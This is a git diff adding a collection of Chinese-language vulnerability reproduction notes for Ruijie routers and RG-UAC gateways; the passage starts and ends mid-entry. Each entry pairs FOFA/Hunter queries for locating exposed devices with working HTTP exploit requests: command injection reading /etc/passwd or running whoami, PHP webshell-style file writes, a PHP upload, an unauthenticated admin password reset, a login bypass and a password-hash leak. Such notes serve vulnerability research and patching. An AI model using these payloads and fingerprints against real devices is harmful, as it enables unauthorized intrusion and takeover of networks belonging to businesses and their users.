+User-Agent: Java/1.8.0_381
+Host: xx.xx.xx.xx
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+Content-Length: 219
+
+--00content0boundary00
+Content-Disposition: form-data; name="uploadDir"
+
+upload
+--00content0boundary00
+Content-Disposition: form-data; name="file"; filename="1.php"
+
+<?php phpinfo();?>
+--00content0boundary00--
+
+```
+
+![1693802445069-749e8cd1-a5e8-4d46-8414-3f97cb5d244a.png](./img/jFBa7SreAbBovuDn/1693802445069-749e8cd1-a5e8-4d46-8414-3f97cb5d244a-776042.png)
+
+上传文件位置
+
+```plain
+https://xx.xx.xx.xx/ddi/server/upload/1.php
+```
+
+![1693802535846-9a7f6ed5-7c93-4144-9561-7097e5d12ec5.png](./img/jFBa7SreAbBovuDn/1693802535846-9a7f6ed5-7c93-4144-9561-7097e5d12ec5-353619.png)
+
+
+
+> 更新: 2024-06-24 11:42:26  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ydw1qor2zc4dv3k8>
\ No newline at end of file
diff --git a/锐捷NBR路由器guestIsUp.php远程命令执行漏洞.md b/锐捷NBR路由器guestIsUp.php远程命令执行漏洞.md
new file mode 100644
index 0000000..87b4bd2
--- /dev/null
+++ b/锐捷NBR路由器guestIsUp.php远程命令执行漏洞.md
@@ -0,0 +1,59 @@
+# 锐捷NBR路由器guestIsUp.php远程命令执行漏洞
+
+**一、漏洞简介**  
+<font style="color:rgb(34, 34, 34);">锐捷网络是一家拥有包括交换机、路由器、软件、安全防火墙、无线产品、存储等全系列的网络设备产品线及解决方案的专业化网络厂商。锐捷NBR 路由器系统存在</font><font style="color:rgb(255, 0, 0);">远程命令执行</font><font style="color:rgb(34, 34, 34);">漏洞，攻击者通过漏洞可以获取服务器权限，导致服务器失陷。</font>  
+**二、影响版本**
+
+Ruijie-NBR路由器
+
+**三、资产测绘**
+
+```plain
+app="Ruijie-NBR路由器"
+```
+
+●登录页面![1711871186381-4330c91f-724e-44b0-9221-324f4adec915.png](./img/Ug2v7cQOIB8QjHRA/1711871186381-4330c91f-724e-44b0-9221-324f4adec915-992891.png)
+
+  
+**四、漏洞复现**
+
+<font style="color:rgb(34, 34, 34);">1.执行查看用户并写入当前目录test.txt的poc</font>
+
+```plain
+POST /guest_auth/guestIsUp.php HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
+Connection: close
+Content-Length: 45
+Content-Type: application/x-www-form-urlencoded
+Accept-Encoding: gzip, deflate
+
+mac=1&ip=127.0.0.1|cat /etc/passwd > test.txt
+```
+
+![1711872621387-84b10c76-c77a-483d-806e-a321c3858a5b.png](./img/Ug2v7cQOIB8QjHRA/1711872621387-84b10c76-c77a-483d-806e-a321c3858a5b-868464.png)
+
+<font style="color:rgb(34, 34, 34);">2.访问该文件，得到回显</font>
+
+```plain
+GET /guest_auth/test.txt HTTP/1.1
+Host: {{Hostname}}
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
+Connection: close
+Accept-Encoding: gzip, deflate
+```
+
+![1711872633663-ac208ec4-6962-4bf6-bb9b-75b75790275c.png](./img/Ug2v7cQOIB8QjHRA/1711872633663-ac208ec4-6962-4bf6-bb9b-75b75790275c-292423.png)
+
+  
+
+
+若有收获，就点个赞吧
+
+  
+ 
+
+
+
+> 更新: 2024-06-24 11:42:26  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/hon6ugvrmt270v4x>
\ No newline at end of file
diff --git a/锐捷RG-BCR860路由器命令执行漏洞（CVE-2023-3450）.md b/锐捷RG-BCR860路由器命令执行漏洞（CVE-2023-3450）.md
new file mode 100644
index 0000000..97e2b45
--- /dev/null
+++ b/锐捷RG-BCR860路由器命令执行漏洞（CVE-2023-3450）.md
@@ -0,0 +1,46 @@
+# 锐捷RG-BCR860路由器命令执行漏洞（CVE-2023-3450）
+
+# 一、漏洞简介
+RG-BCR860是锐捷网络推出的一款商业云路由器，它是专为酒店、餐饮、门店设计，适用带宽100Mbps,带机量可达150台，支持Sec VPM、内置安全审计模块，给商家带来更好的网络营销体验 。该产品主支持全中文的WEB 界面配置，不再需要用传统的命令行进行配置，使得设备更加简单方便的进行维护和管理。RG-BCR860 2.5.13版本存在操作系统命令注入漏洞，该漏洞源于组件Network Diagnostic Page存在问题，会导致操作系统命令注入。
+
+# 二、影响版本
++ 锐捷路由器RG-BCR860
+
+# 三、资产测绘
++ fofa`icon_hash="-399311436"`
+
+![1692606754994-2f1216a0-282b-45a6-94fc-b7f5dd405745.png](./img/m9qo6lOTSwrcQIzK/1692606754994-2f1216a0-282b-45a6-94fc-b7f5dd405745-691021.png)
+
++ 登录页面
+
+![1692606877528-52b592a6-ef53-44d7-8dbc-8ffe1299e9e6.png](./img/m9qo6lOTSwrcQIzK/1692606877528-52b592a6-ef53-44d7-8dbc-8ffe1299e9e6-740734.png)
+
+# 四、漏洞复现
+1. 该漏洞属于后台漏洞，需要登录后台（默认密码：admin）
+
+![1692606937330-5391e9ce-3c7b-4c56-8529-034a3d1a2a32.png](./img/m9qo6lOTSwrcQIzK/1692606937330-5391e9ce-3c7b-4c56-8529-034a3d1a2a32-877796.png)
+
+2. 漏洞位置：网络诊断->Tracert检测->输入`127.0.0.1;cat /etc/passwd`
+
+![1692607017024-349a76e0-e5a3-4a4a-83d1-acaa51b2c694.png](./img/m9qo6lOTSwrcQIzK/1692607017024-349a76e0-e5a3-4a4a-83d1-acaa51b2c694-896230.png)
+
+3. 数据包
+
+```plain
+GET /cgi-bin/luci/;stok=8bbbc7db8f9e3d2d972bd7ab13f21a75/admin/diagnosis?diag=tracert&tracert_address=127.0.0.1%3Bcat+%2Fetc%2Fpasswd&seq=20 HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Connection: close
+Cookie: sysauth=698164456dede213f8f15cebba269273
+```
+
+![1694586407185-44b0cbef-6fc5-4191-be0e-3cebec716a20.png](./img/m9qo6lOTSwrcQIzK/1694586407185-44b0cbef-6fc5-4191-be0e-3cebec716a20-599627.png)
+
+
+
+> 更新: 2024-06-24 11:42:27  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/iodb45mpku6ufxa5>
\ No newline at end of file
diff --git a/锐捷RG-EW1200G路由器后台命令执行.md b/锐捷RG-EW1200G路由器后台命令执行.md
new file mode 100644
index 0000000..e2a21f3
--- /dev/null
+++ b/锐捷RG-EW1200G路由器后台命令执行.md
@@ -0,0 +1,43 @@
+# 锐捷RG-EW1200G路由器后台命令执行
+
+# <font style="color:rgba(0, 0, 0, 0.9);">一、漏洞简介</font>
+<font style="color:rgba(0, 0, 0, 0.9);">锐捷网络RG-EW1200G 存在后台命令执行漏洞，登录路由器后，可执行任意命令，控制内部网络</font>
+
+# 二、影响版本
++ <font style="color:rgba(0, 0, 0, 0.9);">RG-EW1200G无线路由器</font>
+
+# 三、资产测绘
+```plain
+body="/static/js/app.09df2a9e44ab48766f5f.js"
+```
+
+![1711861011537-b26157a8-4ea8-4b53-9e61-798dd6a3cb05.png](./img/T47hLu2WF7iLYEL_/1711861011537-b26157a8-4ea8-4b53-9e61-798dd6a3cb05-076485.png)
+
++ 登录页面
+
+![1711860999021-84f63469-af01-48b1-8a8f-5d94d53d0fd0.png](./img/T47hLu2WF7iLYEL_/1711860999021-84f63469-af01-48b1-8a8f-5d94d53d0fd0-236414.png)
+
+# 四、漏洞复现
+```plain
+POST /bf/tracert HTTP/1.1
+Host: 
+Content-Length: 53
+Accept: application/json, text/plain, */*
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+Content-Type: application/json;charset=UTF-8
+Origin: http://175.167.44.37:6060
+Referer: http://175.167.44.37:6060/
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: bcrsession=f1d7956e195d123d8f0b4a6670553a7cda05348636f998dddeff1d3f3fe1fc8d87ed86b4b4818536
+Connection: close
+
+{"tracert_address":"||echo `id`","is_first_req":true}
+```
+
+![]()
+
+
+
+> 更新: 2024-06-24 11:42:27  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/vmp57vmo35od9v3c>
\ No newline at end of file
diff --git a/锐捷RG-EW1200G路由器未授权任意密码修改.md b/锐捷RG-EW1200G路由器未授权任意密码修改.md
new file mode 100644
index 0000000..2f13820
--- /dev/null
+++ b/锐捷RG-EW1200G路由器未授权任意密码修改.md
@@ -0,0 +1,43 @@
+# 锐捷RG-EW1200G路由器未授权任意密码修改
+
+# <font style="color:rgba(0, 0, 0, 0.9);">一、漏洞简介</font>
+<font style="color:rgba(0, 0, 0, 0.9);">锐捷网络RG-EW1200G 存在未授权任意密码修改漏洞，允许任何用户未授权修改密码。登录路由器，获取敏感信息，控制内部网络</font>
+
+# 二、影响版本
++ <font style="color:rgba(0, 0, 0, 0.9);">RG-EW1200G无线路由器</font>
+
+# 三、资产测绘
+```plain
+body="/static/js/app.09df2a9e44ab48766f5f.js"
+```
+
+![1711861011537-b26157a8-4ea8-4b53-9e61-798dd6a3cb05.png](./img/ZZUhORDFnoBu0aNb/1711861011537-b26157a8-4ea8-4b53-9e61-798dd6a3cb05-295961.png)
+
++ 登录页面
+
+![1711860999021-84f63469-af01-48b1-8a8f-5d94d53d0fd0.png](./img/ZZUhORDFnoBu0aNb/1711860999021-84f63469-af01-48b1-8a8f-5d94d53d0fd0-601664.png)
+
+# 四、漏洞复现
+```plain
+POST /api/sys/set_passwd HTTP/1.1
+Host: 
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Content-Length: 0
+Content-Type: application/x-www-form-urlencoded
+DNT: 1
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+
+{"username":"admin","admin_new":"123456"}
+```
+
+![1711865641902-da372739-98a1-4b1e-b25e-286ffb287b58.png](./img/ZZUhORDFnoBu0aNb/1711865641902-da372739-98a1-4b1e-b25e-286ffb287b58-292126.png)
+
+![1711861062625-d4b54cd2-b4dc-4d66-a6ea-f5b5d18788af.png](./img/ZZUhORDFnoBu0aNb/1711861062625-d4b54cd2-b4dc-4d66-a6ea-f5b5d18788af-036339.png)
+
+
+
+> 更新: 2024-06-24 11:42:27  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/bwyubc8k94kw6h1e>
\ No newline at end of file
diff --git a/锐捷RG-EW1200G路由器登录绕过（CVE-2023-4415）.md b/锐捷RG-EW1200G路由器登录绕过（CVE-2023-4415）.md
new file mode 100644
index 0000000..d6eed6b
--- /dev/null
+++ b/锐捷RG-EW1200G路由器登录绕过（CVE-2023-4415）.md
@@ -0,0 +1,44 @@
+# 锐捷RG-EW1200G路由器登录绕过（CVE-2023-4415）
+
+# 一、漏洞简介
+<font style="color:rgba(0, 0, 0, 0.9);">锐捷网络RG-EW1200G 存在登录绕过逻辑漏洞，允许任何用户无需密码即可获得设备管理员权限。登录路由器，获取敏感信息，控制内部网络</font>
+
+# 二、影响版本
++ <font style="color:rgba(0, 0, 0, 0.9);">RG-EW1200G无线路由器</font>
+
+# 三、资产测绘
+```plain
+body="/static/js/app.09df2a9e44ab48766f5f.js"
+```
+
+![1711861011537-b26157a8-4ea8-4b53-9e61-798dd6a3cb05.png](./img/3ET-mOfgefETA8gY/1711861011537-b26157a8-4ea8-4b53-9e61-798dd6a3cb05-166465.png)
+
++ 登录页面
+
+![1711860999021-84f63469-af01-48b1-8a8f-5d94d53d0fd0.png](./img/3ET-mOfgefETA8gY/1711860999021-84f63469-af01-48b1-8a8f-5d94d53d0fd0-381136.png)
+
+# 四、漏洞复现
+1. 输入任意密码抓包然后修改usernam为2
+
+```plain
+POST /api/sys/login HTTP/1.1
+Host: 
+Content-Length: 63
+Accept: application/json, text/plain, */*
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+
+{"username":"2","password":"dsaff","timestamp":1695813951000}
+```
+
+![1711860903082-cb6573f6-4e1e-458e-97c7-1f16a736665e.png](./img/3ET-mOfgefETA8gY/1711860903082-cb6573f6-4e1e-458e-97c7-1f16a736665e-437495.png)
+
+![1711861062625-d4b54cd2-b4dc-4d66-a6ea-f5b5d18788af.png](./img/3ET-mOfgefETA8gY/1711861062625-d4b54cd2-b4dc-4d66-a6ea-f5b5d18788af-026357.png)
+
+
+
+> 更新: 2024-06-24 11:42:27  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/dnkvdymiquisy7gd>
\ No newline at end of file
diff --git a/锐捷RG-ISG账号密码泄露漏洞.md b/锐捷RG-ISG账号密码泄露漏洞.md
new file mode 100644
index 0000000..d383e87
--- /dev/null
+++ b/锐捷RG-ISG账号密码泄露漏洞.md
@@ -0,0 +1,32 @@
+# 锐捷RG-ISG账号密码泄露漏洞
+
+**一、漏洞简介**
+
+<font style="color:rgb(51, 51, 51);">锐捷ISG存在账号密码泄露漏洞，可以获取密码的md5值, 解密后获取后台权限</font>
+
+**二、影响版本**  
+锐捷RG-ISG  
+**三、资产测绘**
+
+`title="RG-ISG"`  
+●登录页面
+
+![1711904678558-9afdd3ad-2c1b-4252-bdef-cc1a79b99a05.png](./img/rsF9R9NFuIVrcSRD/1711904678558-9afdd3ad-2c1b-4252-bdef-cc1a79b99a05-504193.webp)
+
+  
+**四、漏洞复现**  
+
+
+首页查看源代码，搜索<font style="color:rgb(0, 0, 0);">persons </font>字段
+
+![1712097097492-45caba67-a4aa-4bec-997c-e67d7a85d510.png](./img/rsF9R9NFuIVrcSRD/1712097097492-45caba67-a4aa-4bec-997c-e67d7a85d510-994591.png)
+
+![1712097137836-f93be1b8-8a0b-45a4-995c-75bade1d2434.png](./img/rsF9R9NFuIVrcSRD/1712097137836-f93be1b8-8a0b-45a4-995c-75bade1d2434-642070.png)
+
+  
+
+
+
+
+> 更新: 2024-06-24 11:42:25  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gq2226cz30ascc2d>
\ No newline at end of file
diff --git a/锐捷RG-UAC应用网关nmc_sync.php前台RCE漏洞.md b/锐捷RG-UAC应用网关nmc_sync.php前台RCE漏洞.md
new file mode 100644
index 0000000..f5f8243
--- /dev/null
+++ b/锐捷RG-UAC应用网关nmc_sync.php前台RCE漏洞.md
@@ -0,0 +1,32 @@
+# 锐捷RG-UAC应用网关nmc_sync.php前台RCE漏洞
+
+### 一、漏洞描述
+<font style="color:rgba(0, 0, 0, 0.9);">锐捷RG-UAC应用管理网关 nmc_sync.php 接口处存在命令执行漏洞，未经身份认证的攻击者可执行任意命令控制服务器权限。</font>
+
+### 二、影响版本
+锐捷RG-UAC应用网关
+
+### 三、资产测绘
+fofa：app="Ruijie-RG-UAC"
+
+特征：
+
+![1708679452594-4ac22429-3b10-4a58-8ee3-d7d42244c115.png](./img/iuhRqqHjm3R_IJCE/1708679452594-4ac22429-3b10-4a58-8ee3-d7d42244c115-825054.png)
+
+### 四、漏洞复现
+```plain
+GET /view/systemConfig/management/nmc_sync.php?center_ip=127.0.0.1&template_path=|whoami%20>dudesuite.txt|cat HTTP/1.1
+Host: xxx
+Accept-Encoding: gzip
+```
+
+![1708679288910-596012c6-d177-41dc-a2b2-8cf937685e25.png](./img/iuhRqqHjm3R_IJCE/1708679288910-596012c6-d177-41dc-a2b2-8cf937685e25-057665.png)
+
+访问：https://xxx/view/systemConfig/management/dudesuite.txt
+
+![1708679132388-d1d1e207-cb68-40d9-8fb6-210f1fd42355.png](./img/iuhRqqHjm3R_IJCE/1708679132388-d1d1e207-cb68-40d9-8fb6-210f1fd42355-882522.png)
+
+
+
+> 更新: 2024-06-24 11:42:29  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ex5ms24mq3tyi9wb>
\ No newline at end of file
diff --git a/锐捷RG-UAC应用网关online_check.php前台RCE漏洞.md b/锐捷RG-UAC应用网关online_check.php前台RCE漏洞.md
new file mode 100644
index 0000000..d4ddc46
--- /dev/null
+++ b/锐捷RG-UAC应用网关online_check.php前台RCE漏洞.md
@@ -0,0 +1,90 @@
+# 锐捷RG-UAC应用网关online_check.php前台RCE漏洞
+
+### 一、漏洞描述
+<font style="color:rgba(0, 0, 0, 0.9);">锐捷RG-UAC应用管理网关 online_check.php 接口处存在命令执行漏洞，未经身份认证的攻击者可执行任意命令控制服务器权限。</font>
+
+### 二、影响版本
+锐捷RG-UAC应用网关
+
+### 三、资产测绘
+fofa：app="Ruijie-RG-UAC"
+
+特征：
+
+![1708679452594-4ac22429-3b10-4a58-8ee3-d7d42244c115.png](./img/dW2Qo23Th4j1ct2P/1708679452594-4ac22429-3b10-4a58-8ee3-d7d42244c115-117320.png)
+
+### 四、漏洞复现
+访问该链接出现如下页面表示可能存在漏洞
+
+```java
+/view/vpn/autovpn/online_check.php
+```
+
+![1710431715996-8076fb25-cda8-46d5-98cc-ba2f96e1c4ad.png](./img/dW2Qo23Th4j1ct2P/1710431715996-8076fb25-cda8-46d5-98cc-ba2f96e1c4ad-365591.png)
+
+```java
+iii:0,hit:0 
+```
+
+通过以下poc写入文件
+
+```java
+GET /view/vpn/autovpn/online_check.php?peernode=%20|%20`echo%20PD9waHAgZWNobyAxMTEqMTExOyB1bmxpbmsoX19GSUxFX18pOyA/Pg==%20|%20base64%20-d%20%3E%20test.php` HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Sec-Ch-Ua: "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"
+Sec-Ch-Ua-Mobile: ?0
+Sec-Ch-Ua-Platform: "Windows"
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Sec-Fetch-User: ?1
+Upgrade-Insecure-Requests: 1
+```
+
+![1710431853374-b1498b38-c30c-43f0-8893-fa8e7893337f.png](./img/dW2Qo23Th4j1ct2P/1710431853374-b1498b38-c30c-43f0-8893-fa8e7893337f-478863.png)
+
+文件写入位置
+
+```java
+/view/vpn/autovpn/test.php
+```
+
+![1710431872991-5400bcfa-93cf-4df9-9e50-f00e5c241555.png](./img/dW2Qo23Th4j1ct2P/1710431872991-5400bcfa-93cf-4df9-9e50-f00e5c241555-640890.png)通过如下poc执行命令
+
+```java
+GET /view/vpn/autovpn/online_check.php?peernode=%20|%20`whoami%20>%201.txt` HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Sec-Ch-Ua: "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"
+Sec-Ch-Ua-Mobile: ?0
+Sec-Ch-Ua-Platform: "Windows"
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Sec-Fetch-User: ?1
+Upgrade-Insecure-Requests: 1
+```
+
+![1710431969941-59a7fcd6-882f-425d-85e2-d70c10e71bba.png](./img/dW2Qo23Th4j1ct2P/1710431969941-59a7fcd6-882f-425d-85e2-d70c10e71bba-586973.png)
+
+获取命令执行结果
+
+```java
+/view/vpn/autovpn/1.txt
+```
+
+![1710431991407-1d277e48-b876-4742-adcf-ca69ccb757d9.png](./img/dW2Qo23Th4j1ct2P/1710431991407-1d277e48-b876-4742-adcf-ca69ccb757d9-381585.png)
+
+
+
+> 更新: 2024-06-24 11:42:29  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ektr1dwcngu6c0ct>
\ No newline at end of file
diff --git a/锐捷RG-UAC应用网关static_convert.php前台RCE漏洞.md b/锐捷RG-UAC应用网关static_convert.php前台RCE漏洞.md
new file mode 100644
index 0000000..86e9035
--- /dev/null
+++ b/锐捷RG-UAC应用网关static_convert.php前台RCE漏洞.md
@@ -0,0 +1,47 @@
+# 锐捷RG-UAC应用网关static_convert.php前台RCE漏洞
+
+### 一、漏洞描述
+<font style="color:rgba(0, 0, 0, 0.9);">锐捷RG-UAC应用管理网关static_convert.php 接口处存在命令执行漏洞，未经身份认证的攻击者可执行任意命令控制服务器权限。</font>
+
+### 二、影响版本
+锐捷RG-UAC应用网关
+
+### 三、资产测绘
+fofa：app="Ruijie-RG-UAC"
+
+特征：
+
+![1708679452594-4ac22429-3b10-4a58-8ee3-d7d42244c115.png](./img/Q8lxrxaSC9nu8f0u/1708679452594-4ac22429-3b10-4a58-8ee3-d7d42244c115-439134.png)
+
+### 四、漏洞复现
+```java
+GET /view/IPV6/naborTable/static_convert.php?blocks[0]=|echo%20%27<?php%20echo%20md5("666");unlink(__FILE__);?>%27%20>/var/www/html/ceshi.php HTTP/1.1
+Host:
+Accept: application/json, text/javascript, */*
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+```
+
+![1718990706166-fc93cf5e-ef51-4a13-b3dd-ca7d657fbc41.png](./img/Q8lxrxaSC9nu8f0u/1718990706166-fc93cf5e-ef51-4a13-b3dd-ca7d657fbc41-942982.png)
+
+```java
+GET /ceshi.php HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Content-Length: 0
+```
+
+![1718990752914-a4154066-0057-4a6c-9bdb-53d9f30aebf0.png](./img/Q8lxrxaSC9nu8f0u/1718990752914-a4154066-0057-4a6c-9bdb-53d9f30aebf0-266952.png)
+
+
+
+
+
+
+
+
+
+> 更新: 2024-06-24 11:42:29  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ofaghdl3fyqnfsf3>
\ No newline at end of file
diff --git a/锐捷RG-UAC统一上网行为管理审计系统detail后台命令执行漏洞.md b/锐捷RG-UAC统一上网行为管理审计系统detail后台命令执行漏洞.md
new file mode 100644
index 0000000..49d13b1
--- /dev/null
+++ b/锐捷RG-UAC统一上网行为管理审计系统detail后台命令执行漏洞.md
@@ -0,0 +1,47 @@
+# 锐捷RG-UAC统一上网行为管理审计系统detail后台命令执行漏洞
+
+# 一、漏洞简介
+锐捷RG-UAC统一上网行为管理审计系统存在命令执行漏洞,可以通过漏洞获取root权限 。
+
+# 二、影响版本
++ 锐捷RG-UAC统一上网行为管理审计系统
+
+# 三、资产测绘
++ hunter`app.name="Ruijie 锐捷 RG-UAC"`
++ fofoa:`app="Ruijie-RG-UAC"`
+
+登录页
+
+![1711942665811-46dbe53d-d2cc-433f-ac40-7a78aa2d4c6c.png](./img/gF4XDP2ta0uNLHZK/1711942665811-46dbe53d-d2cc-433f-ac40-7a78aa2d4c6c-711674.png)
+
+# 四、漏洞复现
+使用弱口令/敏感信息泄露漏洞登录系统后台
+
+![1714985896501-ee5e7557-a9fe-4b1f-9baa-a777b9f147e5.png](./img/gF4XDP2ta0uNLHZK/1714985896501-ee5e7557-a9fe-4b1f-9baa-a777b9f147e5-751856.png)
+
+获取Cookie后使用下面poc
+
+```plain
+POST /view/bugSolve/viewData/detail.php HTTP/1.1
+Host: 
+Cookie: PHPSESSID=ae63a240e1fdfb5614107040d19120f3
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Content-Length: 20
+
+filename=`ls+>1.txt`
+```
+
+![1714988517706-aae838cd-fdf4-4f18-a789-de04ff09a1fd.png](./img/gF4XDP2ta0uNLHZK/1714988517706-aae838cd-fdf4-4f18-a789-de04ff09a1fd-777574.png)
+
+```plain
+/view/bugSolve/viewData/1.txt
+```
+
+![1714988508026-11d47db5-e476-435c-97fd-a8465cb23151.png](./img/gF4XDP2ta0uNLHZK/1714988508026-11d47db5-e476-435c-97fd-a8465cb23151-830434.png)
+
+
+
+> 更新: 2024-06-24 11:42:28  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/kvrauhs29vtg9mgs>
\ No newline at end of file
diff --git a/锐捷RG-UAC统一上网行为管理审计系统gre_add_commit后台命令执行漏洞.md b/锐捷RG-UAC统一上网行为管理审计系统gre_add_commit后台命令执行漏洞.md
new file mode 100644
index 0000000..6e1bc8a
--- /dev/null
+++ b/锐捷RG-UAC统一上网行为管理审计系统gre_add_commit后台命令执行漏洞.md
@@ -0,0 +1,47 @@
+# 锐捷RG-UAC统一上网行为管理审计系统gre_add_commit后台命令执行漏洞
+
+# 一、漏洞简介
+锐捷RG-UAC统一上网行为管理审计系统存在命令执行漏洞,可以通过漏洞获取root权限 。
+
+# 二、影响版本
++ 锐捷RG-UAC统一上网行为管理审计系统
+
+# 三、资产测绘
++ hunter`app.name="Ruijie 锐捷 RG-UAC"`
++ fofoa:`app="Ruijie-RG-UAC"`
+
+登录页
+
+![1711942665811-46dbe53d-d2cc-433f-ac40-7a78aa2d4c6c.png](./img/SlJI9VhHutLak0Um/1711942665811-46dbe53d-d2cc-433f-ac40-7a78aa2d4c6c-226376.png)
+
+# 四、漏洞复现
+使用弱口令/敏感信息泄露漏洞登录系统后台
+
+![1714985896501-ee5e7557-a9fe-4b1f-9baa-a777b9f147e5.png](./img/SlJI9VhHutLak0Um/1714985896501-ee5e7557-a9fe-4b1f-9baa-a777b9f147e5-123556.png)
+
+获取Cookie后使用下面poc
+
+```plain
+POST /view/networkConfig/GRE/gre_add_commit.php HTTP/1.1
+Host: 
+Cookie: PHPSESSID=ae63a240e1fdfb5614107040d19120f3
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Content-Length: 33
+
+name=`ls+>1.txt`&remote=1&local=1
+```
+
+![1714989028857-fa8d17c5-2707-47a9-a848-f06cbe2e54a9.png](./img/SlJI9VhHutLak0Um/1714989028857-fa8d17c5-2707-47a9-a848-f06cbe2e54a9-498056.png)
+
+```plain
+/view/networkConfig/GRE/1.txt
+```
+
+![1714989065311-f14ac78a-a58b-41ff-b610-bbd258b33d8f.png](./img/SlJI9VhHutLak0Um/1714989065311-f14ac78a-a58b-41ff-b610-bbd258b33d8f-428322.png)
+
+
+
+> 更新: 2024-06-24 11:42:28  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ovq2b0zgu49oviyd>
\ No newline at end of file
diff --git a/锐捷RG-UAC统一上网行为管理审计系统gre_edit后台命令执行漏洞.md b/锐捷RG-UAC统一上网行为管理审计系统gre_edit后台命令执行漏洞.md
new file mode 100644
index 0000000..cc6b71e
--- /dev/null
+++ b/锐捷RG-UAC统一上网行为管理审计系统gre_edit后台命令执行漏洞.md
@@ -0,0 +1,47 @@
+# 锐捷RG-UAC统一上网行为管理审计系统gre_edit后台命令执行漏洞
+
+# 一、漏洞简介
+锐捷RG-UAC统一上网行为管理审计系统存在账号密码信息泄露,可以间接获取用户账号密码信息登录后台 。
+
+# 二、影响版本
++ 锐捷RG-UAC统一上网行为管理审计系统
+
+# 三、资产测绘
++ hunter`app.name="Ruijie 锐捷 RG-UAC"`
++ fofoa:`app="Ruijie-RG-UAC"`
+
+登录页
+
+![1711942665811-46dbe53d-d2cc-433f-ac40-7a78aa2d4c6c.png](./img/wf8C3DaCBPoqZ1fi/1711942665811-46dbe53d-d2cc-433f-ac40-7a78aa2d4c6c-701572.png)
+
+# 四、漏洞复现
+使用弱口令/敏感信息泄露漏洞登录系统后台
+
+![1714985896501-ee5e7557-a9fe-4b1f-9baa-a777b9f147e5.png](./img/wf8C3DaCBPoqZ1fi/1714985896501-ee5e7557-a9fe-4b1f-9baa-a777b9f147e5-874417.png)
+
+获取Cookie后使用下面poc
+
+```plain
